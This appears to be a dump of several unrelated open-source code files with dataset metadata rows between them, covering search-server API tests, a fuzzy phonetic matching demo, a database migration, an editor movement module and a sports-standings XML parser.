# read index config
with open(self.example_dir + '/index_config.yaml', 'r', encoding='utf-8') as file_obj:
index_config_yaml = file_obj.read()
# create index
response = requests.put('http://{0}:{1}/indices/test_index?sync=True'.format(self.host, self.port),
data=index_config_yaml.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# read documents
with open(self.example_dir + '/bulk_put.json', 'r', encoding='utf-8') as file_obj:
docs_json = file_obj.read()
# put documents
response = requests.put('http://{0}:{1}/indices/test_index/documents?sync=True'.format(self.host, self.port),
data=docs_json.encode('utf-8'), headers={'Content-Type': 'application/yaml'})
self.assertEqual(HTTPStatus.CREATED, response.status_code)
# commit
response = requests.get('http://{0}:{1}/indices/test_index/commit?sync=True'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# read weighting
with open(self.example_dir + '/weighting.json', 'r', encoding='utf-8') as file_obj:
weighting_json = file_obj.read()
# search documents
response = requests.post(
'http://{0}:{1}/indices/test_index/search?query=search&search_field=text&page_num=1&page_len=10'.format(
self.host, self.port),
data=weighting_json.encode('utf-8'), headers={'Content-Type': 'application/json'})
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(5, data['results']['total'])
def test_put_node(self):
# get status
response = requests.get('http://{0}:{1}/status'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(0, data['node_status']['partner_nodes_count'])
port = get_free_port()
# put node
response = requests.put('http://{0}:{1}/nodes/localhost:{2}'.format(self.host, self.port, port))
sleep(1) # wait for node to be added
self.assertEqual(HTTPStatus.OK, response.status_code)
# get status
response = requests.get('http://{0}:{1}/status'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(1, data['node_status']['partner_nodes_count'])
def test_delete_node(self):
# get status
response = requests.get('http://{0}:{1}/status'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(0, data['node_status']['partner_nodes_count'])
port = get_free_port()
# put node
response = requests.put('http://{0}:{1}/nodes/localhost:{2}'.format(self.host, self.port, port))
sleep(1) # wait for node to be added
self.assertEqual(HTTPStatus.OK, response.status_code)
# get status
response = requests.get('http://{0}:{1}/status'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(1, data['node_status']['partner_nodes_count'])
# delete node
response = requests.delete('http://{0}:{1}/nodes/localhost:{2}'.format(self.host, self.port, port))
sleep(1) # wait for node to be deleted
self.assertEqual(HTTPStatus.OK, response.status_code)
# get status
response = requests.get('http://{0}:{1}/status'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(0, data['node_status']['partner_nodes_count'])
def test_create_snapshot(self):
# get snapshot
response = requests.get('http://{0}:{1}/snapshot'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
# create snapshot
response = requests.put('http://{0}:{1}/snapshot'.format(self.host, self.port))
self.assertEqual(HTTPStatus.ACCEPTED, response.status_code)
sleep(1)
# get snapshot
response = requests.get('http://{0}:{1}/snapshot'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
def test_get_snapshot(self):
# get snapshot
response = requests.get('http://{0}:{1}/snapshot'.format(self.host, self.port))
self.assertEqual(HTTPStatus.NOT_FOUND, response.status_code)
# create snapshot
response = requests.put('http://{0}:{1}/snapshot'.format(self.host, self.port))
self.assertEqual(HTTPStatus.ACCEPTED, response.status_code)
sleep(1)
# get snapshot
response = requests.get('http://{0}:{1}/snapshot'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
# save snapshot
download_file_name = self.temp_dir.name + '/snapshot_downloaded.zip'
with open(download_file_name, 'wb') as f:
f.write(response.content)
# read snapshot
with zipfile.ZipFile(download_file_name) as f:
self.assertEqual(['raft.bin'], f.namelist())
def test_is_healthy(self):
# healthiness
response = requests.get('http://{0}:{1}/healthiness'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
def test_is_alive(self):
# liveness
response = requests.get('http://{0}:{1}/liveness'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
def test_is_ready(self):
# readiness
response = requests.get('http://{0}:{1}/readiness'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
def test_get_status(self):
# get status
response = requests.get('http://{0}:{1}/status'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
data = json.loads(response.text)
self.assertEqual(0, data['node_status']['partner_nodes_count'])
def test_metrics(self):
# metrics
response = requests.get('http://{0}:{1}/metrics'.format(self.host, self.port))
self.assertEqual(HTTPStatus.OK, response.status_code)
| 45.873921
| 120
| 0.636987
| 3,338
| 26,561
| 4.944578
| 0.068604
| 0.085429
| 0.053802
| 0.079612
| 0.849318
| 0.845562
| 0.832414
| 0.832233
| 0.827628
| 0.824114
| 0
| 0.01429
| 0.217499
| 26,561
| 578
| 121
| 45.953287
| 0.779831
| 0.073529
| 0
| 0.712291
| 0
| 0.005587
| 0.196375
| 0.001919
| 0
| 0
| 0
| 0
| 0.26257
| 1
| 0.064246
| false
| 0
| 0.041899
| 0
| 0.108939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e9bde223a3694ce4ea167ce271c7c8c4a6bc6975
| 1,607
|
py
|
Python
|
examples/strategy_comparison.py
|
JarbasAl/phonetic_matcher
|
82c3bd808e40e75086716bf12bf7a719b741e817
|
[
"Apache-2.0"
] | 2
|
2020-12-29T02:38:25.000Z
|
2021-01-15T05:48:56.000Z
|
examples/strategy_comparison.py
|
JarbasAl/phonetic_matcher
|
82c3bd808e40e75086716bf12bf7a719b741e817
|
[
"Apache-2.0"
] | null | null | null |
examples/strategy_comparison.py
|
JarbasAl/phonetic_matcher
|
82c3bd808e40e75086716bf12bf7a719b741e817
|
[
"Apache-2.0"
] | 1
|
2021-04-27T16:44:33.000Z
|
2021-04-27T16:44:33.000Z
|
import phonetic_matcher
# Match strategies powered by rapidfuzz
# https://github.com/maxbachmann/rapidfuzz
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.RATIO)
print(s) # 0.8751379985754986
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.PARTIAL_RATIO)
print(s) # 0.8418402777777777
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.TOKEN_SORT_RATIO)
print(s) # 0.8492120726495727
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.TOKEN_SET_RATIO)
print(s) # 0.9492120726495725
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.PARTIAL_TOKEN_RATIO)
print(s) # 0.9043402777777777
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.PARTIAL_TOKEN_SET_RATIO)
print(s) # 0.9043402777777777
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.PARTIAL_TOKEN_SORT_RATIO)
print(s) # 0.7679766414141413
s = phonetic_matcher.fuzzy_match("hey mycroft", "hey microsoft",
strategy=phonetic_matcher.MatchStrategy.QUICK_LEV_RATIO)
print(s) # 0.8751379985754986
| 53.566667
| 98
| 0.683883
| 172
| 1,607
| 6.156977
| 0.197674
| 0.240793
| 0.120869
| 0.15864
| 0.837583
| 0.784703
| 0.737488
| 0.737488
| 0.737488
| 0.737488
| 0
| 0.109413
| 0.226509
| 1,607
| 29
| 99
| 55.413793
| 0.742558
| 0.143124
| 0
| 0.64
| 0
| 0
| 0.140556
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04
| 0
| 0.04
| 0.32
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7580037c9faeaa48fbf2654bef87eb4f7c5bc5d3
| 194
|
py
|
Python
|
torchero/utils/text/__init__.py
|
juancruzsosa/torchero
|
d1440b7a9c3ab2c1d3abbb282abb9ee1ea240797
|
[
"MIT"
] | 10
|
2020-07-06T13:35:26.000Z
|
2021-08-10T09:46:53.000Z
|
torchero/utils/text/__init__.py
|
juancruzsosa/torchero
|
d1440b7a9c3ab2c1d3abbb282abb9ee1ea240797
|
[
"MIT"
] | 6
|
2020-07-07T20:52:16.000Z
|
2020-07-14T04:05:02.000Z
|
torchero/utils/text/__init__.py
|
juancruzsosa/torchero
|
d1440b7a9c3ab2c1d3abbb282abb9ee1ea240797
|
[
"MIT"
] | 1
|
2021-06-28T17:56:11.000Z
|
2021-06-28T17:56:11.000Z
|
from torchero.utils.text.datasets import TextClassificationDataset
from torchero.utils.text.vectors import KeyedVectors, GLoVeVectors
#from torchero.utils.text.preprocessor import TextTransform
| 48.5
| 66
| 0.876289
| 22
| 194
| 7.727273
| 0.545455
| 0.211765
| 0.3
| 0.370588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06701
| 194
| 3
| 67
| 64.666667
| 0.939227
| 0.298969
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
75947038c090de4e3a6957951852fa9f8e862cdb
| 700
|
py
|
Python
|
verilog/benchmarks_large/cam/generate.py
|
cliffordwolf/yosys-benchmarks
|
52ff6fa991f2ab509618d8aaad02f307aac78848
|
[
"0BSD"
] | 14
|
2018-10-08T05:08:54.000Z
|
2022-01-29T23:12:20.000Z
|
verilog/benchmarks_large/cam/generate.py
|
cliffordwolf/yosys-benchmarks
|
52ff6fa991f2ab509618d8aaad02f307aac78848
|
[
"0BSD"
] | 3
|
2019-02-27T15:16:50.000Z
|
2020-02-15T16:15:43.000Z
|
verilog/benchmarks_large/cam/generate.py
|
cliffordwolf/yosys-benchmarks
|
52ff6fa991f2ab509618d8aaad02f307aac78848
|
[
"0BSD"
] | 6
|
2019-02-04T20:16:49.000Z
|
2021-02-05T03:29:29.000Z
|
#!/usr/bin/env python3
import urllib.request
urllib.request.urlretrieve('https://raw.githubusercontent.com/alexforencich/verilog-cam/32a2b86b0b1fee22f975bf15a64432b60540ac0e/rtl/cam_srl.v', 'cam_srl.vh')
urllib.request.urlretrieve('https://raw.githubusercontent.com/alexforencich/verilog-cam/32a2b86b0b1fee22f975bf15a64432b60540ac0e/rtl/cam_bram.v', 'cam_bram.vh')
urllib.request.urlretrieve('https://raw.githubusercontent.com/alexforencich/verilog-cam/32a2b86b0b1fee22f975bf15a64432b60540ac0e/rtl/priority_encoder.v', 'priority_encoder.vh')
urllib.request.urlretrieve('https://raw.githubusercontent.com/alexforencich/verilog-cam/32a2b86b0b1fee22f975bf15a64432b60540ac0e/rtl/ram_dp.v', 'ram_dp.vh')
| 87.5
| 176
| 0.847143
| 79
| 700
| 7.405063
| 0.316456
| 0.111111
| 0.164103
| 0.198291
| 0.82735
| 0.82735
| 0.82735
| 0.82735
| 0.82735
| 0.82735
| 0
| 0.147016
| 0.018571
| 700
| 7
| 177
| 100
| 0.704512
| 0.03
| 0
| 0
| 0
| 0.8
| 0.758112
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
759e0ff6e1c1902eb2803efea356010115b05890
| 2,991
|
py
|
Python
|
migrations/versions/6146e792cabf_change_pokemon_id.py
|
Matzexxxxx/Monocle
|
af2b1dd163a33c3ea3bb4bdacf37622df65f4b8e
|
[
"MIT"
] | 21
|
2017-11-08T12:56:31.000Z
|
2021-08-19T17:56:35.000Z
|
migrations/versions/6146e792cabf_change_pokemon_id.py
|
Matzexxxxx/Monocle
|
af2b1dd163a33c3ea3bb4bdacf37622df65f4b8e
|
[
"MIT"
] | 5
|
2017-12-16T10:11:35.000Z
|
2018-03-21T09:30:25.000Z
|
migrations/versions/6146e792cabf_change_pokemon_id.py
|
Matzexxxxx/Monocle
|
af2b1dd163a33c3ea3bb4bdacf37622df65f4b8e
|
[
"MIT"
] | 33
|
2017-12-11T12:30:42.000Z
|
2018-04-10T01:48:38.000Z
|
"""change pokemon id
Revision ID: 6146e792cabf
Revises: 436fca55d46a
Create Date: 2017-10-20 23:47:06.314713
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from sqlalchemy.dialects.mysql.mysqldb import MySQLDialect_mysqldb
# revision identifiers, used by Alembic.
revision = '6146e792cabf'
down_revision = '436fca55d46a'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
if isinstance(op.get_context().bind.engine.dialect, MySQLDialect_mysqldb):
op.alter_column('fort_sightings', 'guard_pokemon_id',
existing_type=mysql.TINYINT(display_width=3, unsigned=True),
type_=sa.SmallInteger(),
existing_nullable=True)
op.alter_column('gym_defenders', 'pokemon_id',
existing_type=mysql.INTEGER(display_width=11),
type_=sa.SmallInteger(),
existing_nullable=True)
op.alter_column('mystery_sightings', 'pokemon_id',
existing_type=mysql.TINYINT(display_width=3, unsigned=True),
type_=sa.SmallInteger(),
existing_nullable=True)
op.alter_column('raids', 'pokemon_id',
existing_type=mysql.TINYINT(display_width=3, unsigned=True),
type_=sa.SmallInteger(),
existing_nullable=True)
op.alter_column('sightings', 'pokemon_id',
existing_type=mysql.TINYINT(display_width=3, unsigned=True),
type_=sa.SmallInteger(),
existing_nullable=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
if isinstance(op.get_context().bind.engine.dialect, MySQLDialect_mysqldb):
op.alter_column('sightings', 'pokemon_id',
existing_type=sa.SmallInteger(),
type_=mysql.TINYINT(display_width=3, unsigned=True),
existing_nullable=True)
op.alter_column('raids', 'pokemon_id',
existing_type=sa.SmallInteger(),
type_=mysql.TINYINT(display_width=3, unsigned=True),
existing_nullable=True)
op.alter_column('mystery_sightings', 'pokemon_id',
existing_type=sa.SmallInteger(),
type_=mysql.TINYINT(display_width=3, unsigned=True),
existing_nullable=True)
op.alter_column('gym_defenders', 'pokemon_id',
existing_type=sa.SmallInteger(),
type_=mysql.INTEGER(display_width=11),
existing_nullable=True)
op.alter_column('fort_sightings', 'guard_pokemon_id',
existing_type=sa.SmallInteger(),
type_=mysql.TINYINT(display_width=3, unsigned=True),
existing_nullable=True)
# ### end Alembic commands ###
| 42.728571
| 79
| 0.617854
| 312
| 2,991
| 5.679487
| 0.233974
| 0.055869
| 0.073363
| 0.11851
| 0.805869
| 0.805869
| 0.747743
| 0.747743
| 0.734763
| 0.724605
| 0
| 0.027765
| 0.277499
| 2,991
| 69
| 80
| 43.347826
| 0.792226
| 0.099967
| 0
| 0.769231
| 0
| 0
| 0.094915
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.076923
| 0
| 0.115385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
75a368905b656c7923974e1bdf54dda0dfe55583
| 3,477
|
py
|
Python
|
src/modules/vim_movement.py
|
Shermii/n-editor
|
5f5c5e2b1abe403f1ddc35de314303a1e34e99f9
|
[
"MIT"
] | 1
|
2020-09-01T22:22:09.000Z
|
2020-09-01T22:22:09.000Z
|
src/modules/vim_movement.py
|
Shermii/n-editor
|
5f5c5e2b1abe403f1ddc35de314303a1e34e99f9
|
[
"MIT"
] | 1
|
2021-12-31T00:25:29.000Z
|
2021-12-31T00:25:29.000Z
|
src/modules/vim_movement.py
|
Shermii/Nix
|
5f5c5e2b1abe403f1ddc35de314303a1e34e99f9
|
[
"MIT"
] | null | null | null |
import sys
import os
sys.path.append(os.path.abspath(f'{__file__}/../../'))
from widgets import bind_keys_from_conf
class VIM_MOVE_MODULE:
""" adds h j k l movement when Alt-i is pressed and disables it once Alt-i is pressed again """
def __init__(self, parent):
self.parent = parent
self.importable = True
def vim_move_standard(self, arg=None, key=None):
arg = arg.char.lower()
if (arg == "h"): self.parent.buffer.move_standard(key="Left")
elif (arg == "j"): self.parent.buffer.move_standard(key="Down")
elif (arg == "k"): self.parent.buffer.move_standard(key="Up")
elif (arg == "l"): self.parent.buffer.move_standard(key="Right")
return "break"
def vim_move_jump(self, arg=None, key=None):
arg = arg.char.lower()
if (arg == "h"): self.parent.buffer.move_jump(key="Left")
elif (arg == "j"): self.parent.buffer.move_jump(key="Down")
elif (arg == "k"): self.parent.buffer.move_jump(key="Up")
elif (arg == "l"): self.parent.buffer.move_jump(key="Right")
return "break"
def vim_move_select(self, arg=None, key=None):
arg = arg.char.lower()
if (arg == "h"): self.parent.buffer.move_select(key="Left")
elif (arg == "j"): self.parent.buffer.move_select(key="Down")
elif (arg == "k"): self.parent.buffer.move_select(key="Up")
elif (arg == "l"): self.parent.buffer.move_select(key="Right")
return "break"
def vim_move_jump_select(self, arg=None, key=None):
arg = arg.char.lower()
if (arg == "h"): self.parent.buffer.move_jump_select(key="Left")
elif (arg == "j"): self.parent.buffer.move_jump_select(key="Down")
elif (arg == "k"): self.parent.buffer.move_jump_select(key="Up")
elif (arg == "l"): self.parent.buffer.move_jump_select(key="Right")
return "break"
def mode_set_move(self, arg=None):
self.parent.buffer.mode_set(mode="move")
if (self.parent.buffer.mode == "move"):
self.parent.buffer.bind_key_with_all_mod("H", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("J", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("K", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("L", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("h", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("j", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("k", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
self.parent.buffer.bind_key_with_all_mod("l", [self.vim_move_jump_select, self.vim_move_jump, self.vim_move_select, self.vim_move_standard])
else:
self.parent.buffer.unbind_key_with_all_mod("H")
self.parent.buffer.unbind_key_with_all_mod("J")
self.parent.buffer.unbind_key_with_all_mod("K")
self.parent.buffer.unbind_key_with_all_mod("L")
self.parent.buffer.unbind_key_with_all_mod("h")
self.parent.buffer.unbind_key_with_all_mod("j")
self.parent.buffer.unbind_key_with_all_mod("k")
self.parent.buffer.unbind_key_with_all_mod("l")
bind_keys_from_conf(self.parent.buffer)
return "break"
| 49.671429
| 143
| 0.739431
| 588
| 3,477
| 4.059524
| 0.107143
| 0.108504
| 0.234604
| 0.134059
| 0.848345
| 0.848345
| 0.824466
| 0.808546
| 0.780897
| 0.737746
| 0
| 0
| 0.101237
| 3,477
| 70
| 144
| 49.671429
| 0.76384
| 0.025022
| 0
| 0.155172
| 0
| 0
| 0.041975
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.068966
| 0
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f939a9ce895629f189ff1ee15d8753a0bdf2914f
| 46,227
|
py
|
Python
|
stats/teamstanding.py
|
fearless-spider/python_playground
|
5150b2de09736d68558f4c159e110a7ebbe29bfc
|
[
"BSD-3-Clause"
] | null | null | null |
stats/teamstanding.py
|
fearless-spider/python_playground
|
5150b2de09736d68558f4c159e110a7ebbe29bfc
|
[
"BSD-3-Clause"
] | null | null | null |
stats/teamstanding.py
|
fearless-spider/python_playground
|
5150b2de09736d68558f4c159e110a7ebbe29bfc
|
[
"BSD-3-Clause"
] | null | null | null |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import traceback
from xml.sax import make_parser
from xml.sax.handler import ContentHandler
from statsfiles import live_files, schedule_files
from statsutils import find_value_in_array2args, find_value_in_array4args, path, debug, send_mail
from statsdb import db_open, db_close, get_stands, get_teams, insert_standings
__author__ = 'fearless'
class NBAHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '2')
elif name == 'nba-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name == 'wins' or name == 'losses' or name == 'games-back':
self.group = name
self.type = ''
self.num = attrs.get('number')
self.num2 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.num = attrs.get('percentage')
self.num2 = ''
elif name == 'place':
self.group = name
self.type = ''
self.num = attrs.get('place')
self.num2 = ''
elif name == 'points-for-per-game' or name == 'points-against-per-game':
self.group = name
self.type = ''
self.num = attrs.get('points')
self.num2 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.num = attrs.get('games')
self.num2 = ''
elif name == 'conference-seed':
self.group = name
self.type = ''
self.num = attrs.get('seed')
self.num2 = ''
elif name == 'conference-games-back':
self.group = name
self.type = ''
self.num = attrs.get('games')
self.num2 = ''
elif name == 'eliminated-from-playoffs':
self.group = name
self.type = ''
self.num = attrs.get('eliminated')
self.num2 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'nba-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
print data
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name == 'wins' or name == 'losses' \
or name == 'games-back' \
or name == 'winning-percentage' \
or name == 'place' \
or name == 'points-for-per-game' or name == 'points-against-per-game' \
or name == 'win-loss-record' \
or name == 'streak' \
or name == 'conference-seed' \
or name == 'conference-games-back' \
or name == 'eliminated-from-playoffs':
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class WNBAHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '5082')
elif name == 'wnba-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name == 'wins' or name == 'losses' or name == 'games-back':
self.group = name
self.type = ''
self.num = attrs.get('number')
self.num2 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.num = attrs.get('percentage')
self.num2 = ''
elif name == 'place':
self.group = name
self.type = ''
self.num = attrs.get('place')
self.num2 = ''
elif name == 'points-for-per-game' or name == 'points-against-per-game':
self.group = name
self.type = ''
self.num = attrs.get('points')
self.num2 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.num = attrs.get('games')
self.num2 = ''
elif name == 'conference-seed':
self.group = name
self.type = ''
self.num = attrs.get('seed')
self.num2 = ''
elif name == 'conference-games-back':
self.group = name
self.type = ''
self.num = attrs.get('games')
self.num2 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'wnba-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name == 'wins' or name == 'losses' \
or name == 'games-back' \
or name == 'winning-percentage' \
or name == 'place' \
or name == 'points-for-per-game' or name == 'points-against-per-game' \
or name == 'win-loss-record' \
or name == 'streak' \
or name == 'conference-seed' \
or name == 'conference-games-back':
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class CBKHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '128')
elif name == 'cbk-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name == 'wins' or name == 'losses':
self.group = name
self.type = ''
self.num = attrs.get('number')
self.num2 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.num = attrs.get('percentage')
self.num2 = ''
elif name == 'place':
self.group = name
self.type = ''
self.num = attrs.get('place')
self.num2 = ''
elif name == 'ranking':
self.group = name
self.type = ''
self.num = attrs.get('ranking')
self.num2 = ''
elif name == 'points-for' or name == 'points-against':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('number')
self.num2 = ''
elif name == 'sos':
self.group = name
self.type = ''
self.num = attrs.get('rank')
self.num2 = attrs.get('sos')
elif name == 'rpi':
self.group = name
self.type = ''
self.num = attrs.get('rank')
self.num2 = attrs.get('rpi')
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.num = attrs.get('games')
self.num2 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'cbk-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name == 'wins' or name == 'losses' \
or name == 'winning-percentage' \
or name == 'place' \
or name == 'ranking' \
or name == 'points-for' or name == 'points-against' \
or name == 'rpi' or name == 'sos' \
or name == 'win-loss-record' \
or name == 'streak':
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
